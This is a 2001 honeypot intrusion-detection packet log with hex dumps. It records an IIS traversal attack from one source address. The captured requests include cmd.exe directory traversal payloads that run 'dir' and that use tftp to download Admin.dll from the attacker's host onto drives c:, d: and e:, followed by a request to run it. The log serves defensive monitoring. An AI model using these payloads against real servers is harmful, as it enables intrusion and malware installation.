70 61 74 68 20 69 73 20 hat the path is 1f0 : 63 6F 72 72 65 63 74 2E 3C 2F 70 3E 0D 0A 0D 0A correct.</p>.... 200 : 3C 70 3E 50 6C 65 61 73 65 20 63 6F 6E 74 61 63 <p>Please contac 210 : 74 20 74 68 65 20 73 65 72 76 65 72 27 73 20 61 t the server's a 220 : 64 6D 69 6E 69 73 74 72 61 74 6F 72 20 69 66 20 dministrator if 230 : 74 68 69 73 20 70 72 6F 62 6C 65 6D 20 70 65 72 this problem per 240 : 73 69 73 74 73 2E 3C 2F 70 3E 0D 0A 0D 0A 3C 2F sists.</p>....</ 250 : 62 6F 64 79 3E 3C 2F 68 74 6D 6C 3E body></html> ---------------------------------------------------------------------------- -- #(2 - 25569) [2001-09-18 10:21:39] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=40 ID=47110 flags=0 offset=0 TTL=128 chksum=37268 TCP: port=80 -> dport: 4070 flags=***A***F seq=552428 ack=483904459 off=5 res=0 win=8663 urp=0 chksum=30202 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25570) [2001-09-18 10:21:40] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=49779 flags=0 offset=0 TTL=118 chksum=37159 TCP: port=4070 -> dport: 80 flags=*****R** seq=483904459 ack=0 off=5 res=0 win=0 urp=0 chksum=1491 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25571) [2001-09-18 10:21:40] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=44 ID=50035 flags=0 offset=0 TTL=118 chksum=36899 TCP: port=4144 -> dport: 80 flags=******S* seq=483905021 ack=0 off=6 res=0 win=8192 urp=0 chksum=52124 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25572) [2001-09-18 10:21:40] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=44 ID=47622 flags=0 offset=0 TTL=128 chksum=36752 TCP: port=80 -> dport: 4144 flags=***A**S* seq=552724 ack=483905022 off=6 res=0 win=8760 urp=0 chksum=23095 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25573) [2001-09-18 10:21:40] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=50291 flags=0 offset=0 TTL=118 chksum=53031 TCP: port=4070 -> dport: 80 flags=*****R** seq=483904459 ack=483904459 off=5 res=0 win=0 urp=0 chksum=7472 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25575) [2001-09-18 10:21:40] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=47220 flags=0 offset=0 TTL=119 chksum=39462 TCP: port=4144 -> dport: 80 flags=***A**** seq=483905022 ack=552725 off=5 res=0 win=8760 urp=0 chksum=29172 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25576) [2001-09-18 10:21:40] WEB-IIS cmd.exe access IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=137 ID=47476 flags=0 offset=0 TTL=119 chksum=39109 TCP: port=4144 -> dport: 80 flags=***AP*** seq=483905022 ack=552725 off=5 res=0 win=8760 urp=0 chksum=45567 Payload: length = 91 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C GET /scripts/... 010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 ./winnt/system32 020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 /cmd.exe?/c+dir 030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F dir HTTP/1.0..Ho 040 : 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63 st: www..Connnec 050 : 74 69 6F 6E 3A 20 63 6C 6F 73 65 tion: close ---------------------------------------------------------------------------- -- #(2 - 25577) [2001-09-18 10:21:40] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=231 ID=51206 flags=0 offset=0 TTL=128 chksum=32981 TCP: port=80 -> dport: 4144 flags=***AP*** seq=552725 ack=483905119 off=5 res=0 win=8663 urp=0 chksum=9020 Payload: length = 191 000 : 48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D HTTP/1.1 200 OK. 010 : 0A 53 65 72 76 65 72 3A 20 4D 69 63 72 6F 73 6F .Server: Microso 020 : 66 74 2D 49 49 53 2F 34 2E 30 0D 0A 44 61 74 65 ft-IIS/4.0..Date 030 : 3A 20 54 75 65 2C 20 31 38 20 53 65 70 20 32 30 : Tue, 18 Sep 20 040 : 30 31 20 31 36 3A 30 35 3A 32 31 20 47 4D 54 0D 01 16:05:21 GMT. 050 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 61 .Content-Type: a 060 : 70 70 6C 69 63 61 74 69 6F 6E 2F 6F 63 74 65 74 pplication/octet 070 : 2D 73 74 72 65 61 6D 0D 0A 56 6F 6C 75 6D 65 20 -stream..Volume 080 : 69 6E 20 64 72 69 76 65 20 43 20 68 61 73 20 6E in drive C has n 090 : 6F 20 6C 61 62 65 6C 2E 0D 0A 56 6F 6C 75 6D 65 o label...Volume 0a0 : 20 53 65 72 69 61 6C 20 4E 75 6D 62 65 72 20 69 Serial Number i 0b0 : 73 20 38 30 42 34 2D 38 39 43 41 0D 0A 0D 0A s 80B4-89CA.... ---------------------------------------------------------------------------- -- #(2 - 25578) [2001-09-18 10:21:40] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=403 ID=51462 flags=0 offset=0 TTL=128 chksum=32553 TCP: port=80 -> dport: 4144 flags=***AP**F seq=552916 ack=483905119 off=5 res=0 win=8663 urp=0 chksum=30915 Payload: length = 363 000 : 20 44 69 72 65 63 74 6F 72 79 20 6F 66 20 43 3A Directory of C: 010 : 5C 49 6E 65 74 70 75 62 5C 73 63 72 69 70 74 73 \Inetpub\scripts 020 : 0D 0A 0D 0A 30 39 2F 31 38 2F 30 31 20 20 31 31 ....09/18/01 11 030 : 3A 30 35 61 20 20 20 20 20 20 20 20 3C 44 49 52 :05a <DIR 040 : 3E 20 20 20 20 20 20 20 20 20 20 2E 0D 0A 30 39 > ...09 050 : 2F 31 38 2F 30 31 20 20 31 31 3A 30 35 61 20 20 /18/01 11:05a 060 : 20 20 20 20 20 20 3C 44 49 52 3E 20 20 20 20 20 <DIR> 070 : 20 20 20 20 20 2E 2E 0D 0A 30 39 2F 31 38 2F 30 ....09/18/0 080 : 31 20 20 31 31 3A 30 34 61 20 20 20 20 20 20 20 1 11:04a 090 : 20 20 20 20 20 20 20 20 20 35 37 2C 33 34 34 20 57,344 0a0 : 54 46 54 50 32 30 36 0D 0A 30 39 2F 31 38 2F 30 TFTP206..09/18/0 0b0 : 31 20 20 31 31 3A 30 35 61 20 20 20 20 20 20 20 1 11:05a 0c0 : 20 20 20 20 20 20 20 20 20 20 37 2C 31 36 38 20 7,168 0d0 : 54 46 54 50 32 32 32 0D 0A 30 39 2F 31 38 2F 30 TFTP222..09/18/0 0e0 : 31 20 20 31 31 3A 30 35 61 20 20 20 20 20 20 20 1 11:05a 0f0 : 20 20 20 20 20 20 20 20 20 35 37 2C 33 34 34 20 57,344 100 : 54 46 54 50 38 34 0D 0A 20 20 20 20 20 20 20 20 TFTP84.. 110 : 20 20 20 20 20 20 20 35 20 46 69 6C 65 28 73 29 5 File(s) 120 : 20 20 20 20 20 20 20 20 31 32 31 2C 38 35 36 20 121,856 130 : 62 79 74 65 73 0D 0A 20 20 20 20 20 20 20 20 20 bytes.. 140 : 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 150 : 20 32 2C 31 30 30 2C 36 31 36 2C 37 30 34 20 62 2,100,616,704 b 160 : 79 74 65 73 20 66 72 65 65 0D 0A ytes free.. ---------------------------------------------------------------------------- -- #(2 - 25579) [2001-09-18 10:21:40] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=57460 flags=0 offset=0 TTL=118 chksum=29478 TCP: port=4144 -> dport: 80 flags=*****R** seq=483905119 ack=0 off=5 res=0 win=0 urp=0 chksum=757 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25580) [2001-09-18 10:21:40] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=44 ID=57716 flags=0 offset=0 TTL=118 chksum=29218 TCP: port=4381 -> dport: 80 flags=******S* seq=483907846 ack=0 off=6 res=0 win=8192 urp=0 chksum=49062 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25581) [2001-09-18 10:21:40] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=44 ID=51718 flags=0 offset=0 TTL=128 chksum=32656 TCP: port=80 -> dport: 4381 flags=***A**S* seq=553485 ack=483907847 off=6 res=0 win=8760 urp=0 chksum=19272 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25582) [2001-09-18 10:21:40] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=57972 flags=0 offset=0 TTL=118 chksum=45350 TCP: port=4144 -> dport: 80 flags=*****R** seq=483905119 ack=483905119 off=5 res=0 win=0 urp=0 chksum=6078 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25583) [2001-09-18 10:21:40] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=61044 flags=0 offset=0 TTL=119 chksum=25638 TCP: port=4381 -> dport: 80 flags=***A**** seq=483907847 ack=553486 off=5 res=0 win=8760 urp=0 chksum=25349 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25584) [2001-09-18 10:21:40] WEB-IIS cmd.exe access IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=192 ID=61300 flags=0 offset=0 TTL=119 chksum=25230 TCP: port=4381 -> dport: 80 flags=***AP*** seq=483907847 ack=553486 off=5 res=0 win=8760 urp=0 chksum=26684 Payload: length = 136 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C GET /scripts/... 010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 ./winnt/system32 020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 74 66 74 70 /cmd.exe?/c+tftp 030 : 20 2D 69 20 36 35 2E 32 39 2E 32 34 33 2E 31 38 -i 65.29.243.18 040 : 30 20 47 45 54 20 41 64 6D 69 6E 2E 64 6C 6C 20 0 GET Admin.dll 050 : 63 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 30 63 3A c:\Admin.dll 0c: 060 : 5C 41 64 6D 69 6E 2E 64 6C 6C 20 48 54 54 50 2F \Admin.dll HTTP/ 070 : 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 1.0..Host: www.. 080 : 43 6F 6E 6E 6E 65 63 74 Connnect ---------------------------------------------------------------------------- -- #(2 - 25585) [2001-09-18 10:21:41] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=395 ID=52486 flags=0 offset=0 TTL=128 chksum=31537 TCP: port=80 -> dport: 4381 flags=***AP*** seq=553486 ack=483907999 off=5 res=0 win=8608 urp=0 chksum=63688 Payload: length = 355 000 : 48 54 54 50 2F 31 2E 31 20 35 30 32 20 47 61 74 HTTP/1.1 502 Gat 010 : 65 77 61 79 20 45 72 72 6F 72 0D 0A 53 65 72 76 eway Error..Serv 020 : 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49 er: Microsoft-II 030 : 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65 S/4.0..Date: Tue 040 : 2C 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36 , 18 Sep 2001 16 050 : 3A 30 35 3A 32 31 20 47 4D 54 0D 0A 43 6F 6E 74 :05:21 GMT..Cont 060 : 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 31 35 0D ent-Length: 215. 070 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 .Content-Type: t 080 : 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C 68 65 61 ext/html....<hea 090 : 64 3E 3C 74 69 74 6C 65 3E 45 72 72 6F 72 20 69 d><title>Error i 0a0 : 6E 20 43 47 49 20 41 70 70 6C 69 63 61 74 69 6F n CGI Applicatio 0b0 : 6E 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 64 3E n</title></head> 0c0 : 0A 3C 62 6F 64 79 3E 3C 68 31 3E 43 47 49 20 45 .<body><h1>CGI E 0d0 : 72 72 6F 72 3C 2F 68 31 3E 54 68 65 20 73 70 65 rror</h1>The spe 0e0 : 63 69 66 69 65 64 20 43 47 49 20 61 70 70 6C 69 cified CGI appli 0f0 : 63 61 74 69 6F 6E 20 6D 69 73 62 65 68 61 76 65 cation misbehave 100 : 64 20 62 79 20 6E 6F 74 20 72 65 74 75 72 6E 69 d by not returni 110 : 6E 67 20 61 20 63 6F 6D 70 6C 65 74 65 20 73 65 ng a complete se 120 : 74 20 6F 66 20 48 54 54 50 20 68 65 61 64 65 72 t of HTTP header 130 : 73 2E 20 20 54 68 65 20 68 65 61 64 65 72 73 20 s. The headers 140 : 69 74 20 64 69 64 20 72 65 74 75 72 6E 20 61 72 it did return ar 150 : 65 3A 3C 70 3E 3C 70 3E 3C 70 72 65 3E 3C 2F 70 e:<p><p><pre></p 160 : 72 65 3E re> ---------------------------------------------------------------------------- -- #(2 - 25586) [2001-09-18 10:21:41] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=40 ID=52742 flags=0 offset=0 TTL=128 chksum=31636 TCP: port=80 -> dport: 4381 flags=***A***F seq=553841 ack=483907999 off=5 res=0 win=8608 urp=0 chksum=24993 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25587) [2001-09-18 10:21:41] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=1397 flags=0 offset=0 TTL=118 chksum=20006 TCP: port=4381 -> dport: 80 flags=*****R** seq=483907999 ack=2622773535 off=5 res=0 win=0 urp=0 chksum=340 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25588) [2001-09-18 10:21:41] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=44 ID=1653 flags=0 offset=0 TTL=118 chksum=19746 TCP: port=4392 -> dport: 80 flags=******S* seq=483907905 ack=0 off=6 res=0 win=8192 urp=0 chksum=48992 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25589) [2001-09-18 10:21:41] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=44 ID=52998 flags=0 offset=0 TTL=128 chksum=31376 TCP: port=80 -> dport: 4392 flags=***A**S* seq=553766 ack=483907906 off=6 res=0 win=8760 urp=0 chksum=18921 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25590) [2001-09-18 10:21:41] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=1909 flags=0 offset=0 TTL=118 chksum=35878 TCP: port=4381 -> dport: 80 flags=*****R** seq=483907999 ack=483907999 off=5 res=0 win=0 urp=0 chksum=81 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25591) [2001-09-18 10:21:41] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=8053 flags=0 offset=0 TTL=119 chksum=13094 TCP: port=4392 -> dport: 80 flags=***A**** seq=483907906 ack=553767 off=5 res=0 win=8760 urp=0 chksum=24998 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25592) [2001-09-18 10:21:41] WEB-IIS cmd.exe access IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=192 ID=8309 flags=0 offset=0 TTL=119 chksum=12686 TCP: port=4392 -> dport: 80 flags=***AP*** seq=483907906 ack=553767 off=5 res=0 win=8760 urp=0 chksum=26077 Payload: length = 136 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C GET /scripts/... 010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 ./winnt/system32 020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 74 66 74 70 /cmd.exe?/c+tftp 030 : 20 2D 69 20 36 35 2E 32 39 2E 32 34 33 2E 31 38 -i 65.29.243.18 040 : 30 20 47 45 54 20 41 64 6D 69 6E 2E 64 6C 6C 20 0 GET Admin.dll 050 : 64 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 30 64 3A d:\Admin.dll 0d: 060 : 5C 41 64 6D 69 6E 2E 64 6C 6C 20 48 54 54 50 2F \Admin.dll HTTP/ 070 : 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 1.0..Host: www.. 080 : 43 6F 6E 6E 6E 65 63 74 Connnect ---------------------------------------------------------------------------- -- #(2 - 25593) [2001-09-18 10:21:41] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=395 ID=53510 flags=0 offset=0 TTL=128 chksum=30513 TCP: port=80 -> dport: 4392 flags=***AP*** seq=553767 ack=483908058 off=5 res=0 win=8608 urp=0 chksum=63337 Payload: length = 355 000 : 48 54 54 50 2F 31 2E 31 20 35 30 32 20 47 61 74 HTTP/1.1 502 Gat 010 : 65 77 61 79 20 45 72 72 6F 72 0D 0A 53 65 72 76 eway Error..Serv 020 : 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49 er: Microsoft-II 030 : 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65 S/4.0..Date: Tue 040 : 2C 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36 , 18 Sep 2001 16 050 : 3A 30 35 3A 32 31 20 47 4D 54 0D 0A 43 6F 6E 74 :05:21 GMT..Cont 060 : 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 31 35 0D ent-Length: 215. 070 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 .Content-Type: t 080 : 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C 68 65 61 ext/html....<hea 090 : 64 3E 3C 74 69 74 6C 65 3E 45 72 72 6F 72 20 69 d><title>Error i 0a0 : 6E 20 43 47 49 20 41 70 70 6C 69 63 61 74 69 6F n CGI Applicatio 0b0 : 6E 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 64 3E n</title></head> 0c0 : 0A 3C 62 6F 64 79 3E 3C 68 31 3E 43 47 49 20 45 .<body><h1>CGI E 0d0 : 72 72 6F 72 3C 2F 68 31 3E 54 68 65 20 73 70 65 rror</h1>The spe 0e0 : 63 69 66 69 65 64 20 43 47 49 20 61 70 70 6C 69 cified CGI appli 0f0 : 63 61 74 69 6F 6E 20 6D 69 73 62 65 68 61 76 65 cation misbehave 100 : 64 20 62 79 20 6E 6F 74 20 72 65 74 75 72 6E 69 d by not returni 110 : 6E 67 20 61 20 63 6F 6D 70 6C 65 74 65 20 73 65 ng a complete se 120 : 74 20 6F 66 20 48 54 54 50 20 68 65 61 64 65 72 t of HTTP header 130 : 73 2E 20 20 54 68 65 20 68 65 61 64 65 72 73 20 s. The headers 140 : 69 74 20 64 69 64 20 72 65 74 75 72 6E 20 61 72 it did return ar 150 : 65 3A 3C 70 3E 3C 70 3E 3C 70 72 65 3E 3C 2F 70 e:<p><p><pre></p 160 : 72 65 3E re> ---------------------------------------------------------------------------- -- #(2 - 25594) [2001-09-18 10:21:41] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=40 ID=53766 flags=0 offset=0 TTL=128 chksum=30612 TCP: port=80 -> dport: 4392 flags=***A***F seq=554122 ack=483908058 off=5 res=0 win=8608 urp=0 chksum=24642 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25595) [2001-09-18 10:21:41] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=18805 flags=0 offset=0 TTL=118 chksum=2598 TCP: port=4392 -> dport: 80 flags=*****R** seq=483908058 ack=0 off=5 res=0 win=0 urp=0 chksum=63105 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25596) [2001-09-18 10:21:41] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=44 ID=19061 flags=0 offset=0 TTL=118 chksum=2338 TCP: port=4419 -> dport: 80 flags=******S* seq=483908121 ack=0 off=6 res=0 win=8192 urp=0 chksum=48749 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25597) [2001-09-18 10:21:41] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=44 ID=55302 flags=0 offset=0 TTL=128 chksum=29072 TCP: port=80 -> dport: 4419 flags=***A**S* seq=554266 ack=483908122 off=6 res=0 win=8760 urp=0 chksum=18178 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25598) [2001-09-18 10:21:41] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=19317 flags=0 offset=0 TTL=118 chksum=18470 TCP: port=4392 -> dport: 80 flags=*****R** seq=483908058 ack=483908058 off=5 res=0 win=0 urp=0 chksum=65487 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25599) [2001-09-18 10:21:41] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=28533 flags=0 offset=0 TTL=119 chksum=58149 TCP: port=4419 -> dport: 80 flags=***A**** seq=483908122 ack=554267 off=5 res=0 win=8760 urp=0 chksum=24255 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25600) [2001-09-18 10:21:41] WEB-IIS cmd.exe access IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=192 ID=28789 flags=0 offset=0 TTL=119 chksum=57741 TCP: port=4419 -> dport: 80 flags=***AP*** seq=483908122 ack=554267 off=5 res=0 win=8760 urp=0 chksum=25078 Payload: length = 136 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C GET /scripts/... 010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 ./winnt/system32 020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 74 66 74 70 /cmd.exe?/c+tftp 030 : 20 2D 69 20 36 35 2E 32 39 2E 32 34 33 2E 31 38 -i 65.29.243.18 040 : 30 20 47 45 54 20 41 64 6D 69 6E 2E 64 6C 6C 20 0 GET Admin.dll 050 : 65 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 30 65 3A e:\Admin.dll 0e: 060 : 5C 41 64 6D 69 6E 2E 64 6C 6C 20 48 54 54 50 2F \Admin.dll HTTP/ 070 : 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 1.0..Host: www.. 080 : 43 6F 6E 6E 6E 65 63 74 Connnect ---------------------------------------------------------------------------- -- #(2 - 25601) [2001-09-18 10:21:41] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=395 ID=57862 flags=0 offset=0 TTL=128 chksum=26161 TCP: port=80 -> dport: 4419 flags=***AP*** seq=554267 ack=483908274 off=5 res=0 win=8608 urp=0 chksum=62593 Payload: length = 355 000 : 48 54 54 50 2F 31 2E 31 20 35 30 32 20 47 61 74 HTTP/1.1 502 Gat 010 : 65 77 61 79 20 45 72 72 6F 72 0D 0A 53 65 72 76 eway Error..Serv 020 : 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49 er: Microsoft-II 030 : 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65 S/4.0..Date: Tue 040 : 2C 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36 , 18 Sep 2001 16 050 : 3A 30 35 3A 32 32 20 47 4D 54 0D 0A 43 6F 6E 74 :05:22 GMT..Cont 060 : 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 31 35 0D ent-Length: 215. 070 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 .Content-Type: t 080 : 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C 68 65 61 ext/html....<hea 090 : 64 3E 3C 74 69 74 6C 65 3E 45 72 72 6F 72 20 69 d><title>Error i 0a0 : 6E 20 43 47 49 20 41 70 70 6C 69 63 61 74 69 6F n CGI Applicatio 0b0 : 6E 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 64 3E n</title></head> 0c0 : 0A 3C 62 6F 64 79 3E 3C 68 31 3E 43 47 49 20 45 .<body><h1>CGI E 0d0 : 72 72 6F 72 3C 2F 68 31 3E 54 68 65 20 73 70 65 rror</h1>The spe 0e0 : 63 69 66 69 65 64 20 43 47 49 20 61 70 70 6C 69 cified CGI appli 0f0 : 63 61 74 69 6F 6E 20 6D 69 73 62 65 68 61 76 65 cation misbehave 100 : 64 20 62 79 20 6E 6F 74 20 72 65 74 75 72 6E 69 d by not returni 110 : 6E 67 20 61 20 63 6F 6D 70 6C 65 74 65 20 73 65 ng a complete se 120 : 74 20 6F 66 20 48 54 54 50 20 68 65 61 64 65 72 t of HTTP header 130 : 73 2E 20 20 54 68 65 20 68 65 61 64 65 72 73 20 s. The headers 140 : 69 74 20 64 69 64 20 72 65 74 75 72 6E 20 61 72 it did return ar 150 : 65 3A 3C 70 3E 3C 70 3E 3C 70 72 65 3E 3C 2F 70 e:<p><p><pre></p 160 : 72 65 3E re> ---------------------------------------------------------------------------- -- #(2 - 25602) [2001-09-18 10:21:41] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=40 ID=58118 flags=0 offset=0 TTL=128 chksum=26260 TCP: port=80 -> dport: 4419 flags=***A***F seq=554622 ack=483908274 off=5 res=0 win=8608 urp=0 chksum=23899 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25603) [2001-09-18 10:21:42] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=45429 flags=0 offset=0 TTL=118 chksum=41509 TCP: port=4419 -> dport: 80 flags=*****R** seq=483908274 ack=2875805349 off=5 res=0 win=0 urp=0 chksum=64383 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25604) [2001-09-18 10:21:42] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=44 ID=45685 flags=0 offset=0 TTL=118 chksum=41249 TCP: port=4454 -> dport: 80 flags=******S* seq=483908463 ack=0 off=6 res=0 win=8192 urp=0 chksum=48372 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25605) [2001-09-18 10:21:42] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=44 ID=63238 flags=0 offset=0 TTL=128 chksum=21136 TCP: port=80 -> dport: 4454 flags=***A**S* seq=555058 ack=483908464 off=6 res=0 win=8760 urp=0 chksum=17009 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25606) [2001-09-18 10:21:42] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=45941 flags=0 offset=0 TTL=118 chksum=57381 TCP: port=4419 -> dport: 80 flags=*****R** seq=483908274 ack=483908274 off=5 res=0 win=0 urp=0 chksum=65028 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25607) [2001-09-18 10:21:42] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=64629 flags=0 offset=0 TTL=119 chksum=22053 TCP: port=4454 -> dport: 80 flags=***A**** seq=483908464 ack=555059 off=5 res=0 win=8760 urp=0 chksum=23086 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25608) [2001-09-18 10:21:42] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=117 ID=64885 flags=0 offset=0 TTL=119 chksum=21720 TCP: port=4454 -> dport: 80 flags=***AP*** seq=483908464 ack=555059 off=5 res=0 win=8760 urp=0 chksum=17104 Payload: length = 71 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C GET /scripts/... 010 : 2E 2F 41 64 6D 69 6E 2E 64 6C 6C 20 64 6C 6C 20 ./Admin.dll dll 020 : 48 54 54 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 HTTP/1.0..Host: 030 : 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63 74 69 6F 6E www..Connnection 040 : 3A 20 63 6C 6F 73 65 : close ---------------------------------------------------------------------------- -- #(2 - 25609) [2001-09-18 10:21:42] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=318 ID=775 flags=0 offset=0 TTL=128 chksum=17790 TCP: port=80 -> dport: 4454 flags=***AP*** 